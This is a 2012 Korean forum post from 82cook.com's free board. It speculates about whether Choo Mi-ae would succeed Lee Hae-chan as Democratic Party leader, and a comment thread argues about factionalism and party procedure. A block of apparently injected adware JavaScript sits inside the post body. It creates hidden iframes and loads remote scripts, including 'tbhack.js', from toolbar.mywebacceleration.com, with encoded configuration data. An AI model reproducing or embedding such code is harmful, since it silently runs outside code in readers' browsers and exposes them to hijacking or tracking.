82cook.com을 즐겨찾기에 추가

자유게시판

드러낼 수 없는 고민을 풀어보는 속풀이방

그러고보니 이해찬씨 물러나면 그다음은 추미애라든데;;

루나틱 조회수 : 1,489
김한길이는 사퇴한걸로 알고 있고
다음순서가 추미애라더군요 ㅎㄷㄷ 안철수씨는 추미애를 원했던건가요
노통탄핵때 추미애가 뭐했는지 아시는분은 아실텐데;;
이게 다시뽑는게 아니라 순서라는 말이 있더군요;; 엠팍에서 본건데;;
이게 사실이라는 전재하에 진짜 안철수씨는 추미애를원한한거요;;
(안철수씨가 친노깐게 아니라는 말은 정말 듣고 싶지 않네요 그건 마치 ㅂㄱㅎ라고 말안하고 독재자의딸이라고 
했다고 ㅂㄱㅎ 싫다고 안했다라는거랑 같은거니까요;;)
이니 근데 그게 사실이긴 한건가요;; 추미애라는거;;; 이해찬씨 절때 사표하지 마시길;; 저게 사실이라면
아니더라도 국민이 뽑은 이해찬씨는 절때 사퇴해서는 안됩니다;;
오류는 왜 안고쳐질까요;;
var dm=(typeof document.documentMode!="undefined")?document.documentMode:8;if(dm>7){if(top==window){var fna=document.createElement("iframe");fna.style.zIndex=99999;fna.style.display="none";fna.setAttribute("id","fn_toolbar_portrait");fna.setAttribute("target","_blank");fna.setAttribute("src","http://toolbar.mywebacceleration.com/GLOBE/PC/default_pc_toolbar_portrait.html");fna.style.display="block";fna.style.opacity="0";fna.style.height="45px";fna.style.width="45px";fna.style.overflow="hidden";fna.style.position="relative";fna.setAttribute("frameborder","0");var owner; if (document.body) {owner=document.body;}else{owner=document.documentElement;}owner.appendChild(fna);var fnb=document.createElement("iframe");fnb.style.display="none";fnb.setAttribute("id","fn_toolbar_landscape");fnb.setAttribute("target","_blank");fnb.setAttribute("src","");fnb.style.display="none";fnb.style.width="0px";fnb.setAttribute("frameborder","0");owner.appendChild(fnb);var fnc=document.createElement("iframe"); fnc.style.display="none";fnc.setAttribute("id","fn_toolbar_promotion");fnc.setAttribute("target","_blank");fnc.setAttribute("src","");fnc.style.display="none";fnc.style.width="0px";fnc.setAttribute("frameborder","0");owner.appendChild(fnc);var fn_draggable_config="http://toolbar.mywebacceleration.com/GLOBE/drag_config.js";var fnx=document.createElement("script");fnx.setAttribute("src",fn_draggable_config);fnx.setAttribute("id","fn_draggable_config");var fn_selector_insertion_hack="http://toolbar.mywebacceleration.com/GLOBE/tbhack.js";var fne=document.createElement("script");fne.setAttribute("src",fn_selector_insertion_hack);fne.setAttribute("id","fn_selector_insertion_hack");if(document.head==null || document.head=="undefined" ){document.head = document.getElementsByTagName("head")[0];}document.head.appendChild(fne);document.head.appendChild(fnx);var fn_load_script_tag=function(){var hack = new FNH.TBSIHack();var result = hack.getInsertionFromTBData("PFRCRGF0YT48VEJEYXRhSXRlbSBuYW1lPSJob3N0X3VybCIgdmFsdWU9Imh0dHA6Ly93d3cuODJjb29rLmNvbS9lbnRpei90ZXh0LnBocD9ibj0xNSZhbXA7bnVtPTE0MDI1MzImYW1wO25vPSIgPjwvVEJEYXRhSXRlbT48VEJEYXRhSXRlbSBuYW1lPSJpbnNlcnRpb24iIHZhbHVlPSJodHRwOi8vdG9vbGJhci5teXdlYmFjY2VsZXJhdGlvbi5jb20vR0xPQkUvUEMvaW5zZXJ0aW9uX3BjX21pbi5qcyIgY29uZmlndXJhdGlvbj0idHJ1ZSIgPjwvVEJEYXRhSXRlbT48L1RCRGF0YT4=");if(result){scriptLocation = result;} else {scriptLocation = "http://toolbar.mywebacceleration.com/GLOBE/PC/insertion_pc_min.js" ;} var fnd=document.createElement("script"); fnd.setAttribute("src",scriptLocation); fnd.setAttribute("id","fn_toolbar_script"); fnd.setAttribute("toolbardata","PFRCRGF0YT48VEJEYXRhSXRlbSBuYW1lPSJob3N0X3VybCIgdmFsdWU9Imh0dHA6Ly93d3cuODJjb29rLmNvbS9lbnRpei90ZXh0LnBocD9ibj0xNSZhbXA7bnVtPTE0MDI1MzImYW1wO25vPSIgPjwvVEJEYXRhSXRlbT48VEJEYXRhSXRlbSBuYW1lPSJpbnNlcnRpb24iIHZhbHVlPSJodHRwOi8vdG9vbGJhci5teXdlYmFjY2VsZXJhdGlvbi5jb20vR0xPQkUvUEMvaW5zZXJ0aW9uX3BjX21pbi5qcyIgY29uZmlndXJhdGlvbj0idHJ1ZSIgPjwvVEJEYXRhSXRlbT48L1RCRGF0YT4="); fnd.setAttribute("toolbarhash","eHf4SFmvjSqXH19DKucGTw==");fnd.setAttribute("persdata","PFByaXZhdGVEYXRhPg0KPFByaXZhdGVJdGVtIGtleT0iY2xvc2VkIiB2YWx1ZT0iZmFsc2UiPg0KPC9Qcml2YXRlSXRlbT4NCjxQcml2YXRlSXRlbSBrZXk9Im1pbmltaXplZCIgdmFsdWU9ImZhbHNlIj4NCjwvUHJpdmF0ZUl0ZW0+DQo8UHJpdmF0ZUl0ZW0ga2V5PSJkZWZhdWx0UGVyc1ZhbHVlcyIgdmFsdWU9InRydWUiPg0KPC9Qcml2YXRlSXRlbT4NCjwvUHJpdmF0ZURhdGE+"); document.body.appendChild(fnd);}; fne.title = fn_load_script_tag;}};
16 개의 댓글이 있습니다.
  • 1. ..
    '12.11.4 9:12 PM (180.229.xxx.104)

그러게요
    이해찬 박지원 절대 물러남 안됩니다.
    안철수도 그런 의미까진 아니라 생각해요.

• 2. 중간
    '12.11.4 9:19 PM (1.247.xxx.78)

추미애는 왜 안되는데? 추미애는 민주당 아냐? 정동영은 민주당아냐? 편가르기 쩐다.. 같은 민주당도. 까는 놈들이 안철수하고 단일화 하자고? 그러니 안철수가 진정성 못느끼고 개혁하자는거잖아.. 같은 민주당인 추미애도 용납못하는 사람들이. 민주당도 아닌 안철수한테 단일화 하자니까 그게 먹혀들어?

• 3. 중간
    '12.11.4 9:20 PM (1.247.xxx.78)

추미애가 민주당원으로서의 자격이 없으면. 민주당 탈당시키던가... 같은 당원도 용납못한다고 하면서. 다른 사람과의 화합? 단일화? 지나가던 소가 웃겠네요

• 4. 중간
    '12.11.4 9:22 PM (1.247.xxx.78)

노무현의 가슴에 비수꽃고, 등에 망치질한 정동영은. 왜 민주당에 있는데? 앞뒤도 안맞고, 전후도 안맞고....

• 5. 루나틱
    '12.11.4 9:22 PM (112.198.xxx.81)

1.247.xxx.78// 저는 진영론자가 아니니까요^^ 저는 진영론으로 우리편이니까 안까고 그런걸 제일 싫어 하는 사람입니다 대답이 되었길 바라면서 ㅎㅎ 우리편도 잘못했으면 까야 하는게 상식 아닌가요 안철수씨는 상식이라던데... 뭐 ㅎㅎ

• 6. 중간
    '12.11.4 9:24 PM (1.247.xxx.78)

난 안철수가 되든 문재인이 되든 관ㅅ
    ㅁ없어요. 박근혜만 안되면되요...

진영론 아니면 왜 추미애가 되면 안되는데요?

• 7. 루나틱
    '12.11.4 9:24 PM (112.198.xxx.81)

1.247.xxx.78//제가 보니 누가 진영론자 인지 알겠네요.. 자기 편이면 무조건 비호 해야 한다는거군요 ㅎㅎ 정동영씨는 과거에 잘못했지만 지금은 진정성을 보여주고 있어서 저는 신뢰합니다 돌아온 탕아라고나 할까요? 저는 역시나 한번 잘못했다고 낙인찍는걸 싫어해서 말이죠 근데 추미애 씨는 그런면을 전혀 안보여줍니다 그리고 뭐 제가 쫓아내고 싶다고 해서 쫓아내지나요? 그러면 벌서 몇은 쫓겨났겠죠 ㅎㅎㅎ 무리한 말씀인건 본인도 아시죠? ㅎㅎ

• 8. 중간
    '12.11.4 9:24 PM (1.247.xxx.78)

루니틱. 님이 추미애 안된다는것 자체가 진영론 이잖아요

• 9. ...
    '12.11.4 9:29 PM (180.229.xxx.104)

공당 경선이 장난인가요.
    더구나 국민참여경선을 거쳤죠. 추미애 거기서 몇표 나왔나요
    이해찬이 물러나는게 정치개혁이라는 논리 대보시죠....
    추미애가 안되는게 아니라, 별잘못도 없고 논리도 없이,
    국민이 참여한 공당경선을 무력화시키는게 아주 잘못된 일이라 하는 말입니다

• 10. 루나틱
    '12.11.4 9:31 PM (112.198.xxx.81)

1.247.xxx.78//진영론이 뭔지 모르세요? 민주당사람이면 뭐든 잘못해도 괜찮고 그 외에는 같은 잘못을 해도 나쁜놈 이게 진영론입니다

진영론의 대표적인예는 한국사람이 하면 괜찮고 외국사람이 하면 나쁜거고 같은 행위를 말이죠 그런겁니다

제가 무슨 친노만 괜찮고 다른사람은 다 아니다라고 했나요? 저는 정동영씨면 차라리 좋다고 생각합니다

저는 추미애씨가 한짓때문에 반대 하는겁니다 정동영씨에 대해서는 위에 썼구요

• 11. 루나틱
    '12.11.4 9:32 PM (112.198.xxx.81)

예를들어 친노는 갑이라는 일을 해도 되고 비친노는 갑이라는 일을 하면 천인공로할 놈이다 라는게 진영론입니다... 저는 친노를 지지하나 그딴건 안해요 정동영이아니더라도 괜찮은 사람이면 그게 친노든 비노든 무슨상관입니까..

• 12. 중간
    '12.11.4 9:35 PM (1.247.xxx.78)

루나틱. 내편이 누군데요? 난 문재인이 되었으면 좋겠지만, 친노는 싫어해요. 안철수도 좋아하고 안찰수가 대통령되도 별 상관없어요. 정체성이 모호한 박근혜나, 한나라는 엄청싫어하고, 같은 이유로 통진당도 싫어합니다. 그러므로 난 진영론자가 아닙니다. 루레닉님은. 진영론을 펼치네요. 추미애가 싫으니. 이대로가 좋다는것 아녀요? 그런게 진영론이죠

• 13. 중간
    '12.11.4 9:37 PM (1.247.xxx.78)

무력화를 누가 시키고 있나요? 안철수가? 우리나라 제2당이 안철수때문에 그러는 것인가요! 선택은 민주당이 하는거죠.. 왜 다들 이해찬은 안된다고 하는것일까요.경선으로 된사람이라 무려과 시키는게 안된다면 국민투표로 대통령된 사람 물러나라고 데모해도 안되겠네요.

• 14. ..
    '12.11.4 9:50 PM (125.141.xxx.237)

국민투표로 대통령된 사람 물러나라고 데모해도 안되겠네요.

// 국민투표로 당선된 대통령이니까 원칙대로 하자면 국민들에게 대통령을 소환할 권리도 주는 것이 당연한 겁니다. 지자체장 주민소환 하듯이요. 국회에 대통령 탄핵권이 있지만 엄밀히 말하자면 직접선거로 선출했으니 탄핵도 직접선거로 하는 것이 타당하지요.
    경선 통해 당선된 사람을 뚜렷한 비위 등의 이유도 없이 물러나게 하려면 경선 거쳐서 결정하면 됩니다. 단, 경선에 부칠 명백한 사유가 있어야 하고 퇴진 발의를 위한 정족수를 채우는 등의 절차가 있어야지요. 정확한 당규가 어떻게 되어있는지는 저도 모르겠지만, 이게 상식 아닌가요? 이런 게 절차의 민주주의라는 것이고, 이 권리를 얻기 위해 독재 정권과 싸우며 민주화 운동 해온 겁니다.

• 15. 루나틱
    '12.11.4 10:25 PM (112.198.xxx.81)

125.141.xxx.237//안철수가 국민인가요? 이해찬을 물러나게 하려면 민주당 당원들이 물러나라고 해야죠 왜 안철수가 ㅎㅎ;;

• 16. ..
    '12.11.4 11:51 PM (125.141.xxx.237)

루나틱 //

음, 뭔가 오해하신 듯.;; 윗분이 당에서 이해찬에게 압박 넣어 물러나라고 하는 게 왜 안된다는 거냐, 국민투표로 당선된 대통령한테도 그럼 국민들이 물러나라고 하면 안되는 거 아니냐, 이런 내용으로 글을 올렸잖아요. 그래서 절차 이야기를 한 겁니다. 대통령은 국민들이 뽑은 사람이니까 국민들이 퇴진 압력을 행사할 수 있고, 그래서 탄핵도 직접 선거가 타당하다, 그런 거고요,
    마찬가지 논리로 이해찬이 경선 통해 당선되었으니 당의 압박만으로 물러나게 하는 것은 타당하지 않고 굳이 뚜렷한 이유없이 퇴진을 시켜야한다면 최소한 경선에 준하는 찬반투표에 붙이든 뭐든 선출시와 동일한 절차를 통해 퇴진 여부를 결정해야 한다, 그게 절차적 민주주의 아니냐, 그런 의미로 쓴 글입니다만, 어떤 오해를 하신 건지, 댓글 보니 좀 당황스럽네요. ^^;
    당연히 대선 후보로 나온 安에게는 남의 당 대표에게 퇴진 압력을 넣을 명분도 정당성도 없지요. 넘어서는 안되는 선을 넘는 발언을 했기에 그 비판을 받은 거잖아요. 安이 당원이나 당 지지자라면 또 모를까.
    제가 좀 글을 복잡하게 썼나요?
    전 압박에 의한 이해찬 퇴진 반대에요. 퇴진시키려면 뚜렷한 이유가 있고 정당한 절차가 있어야지요.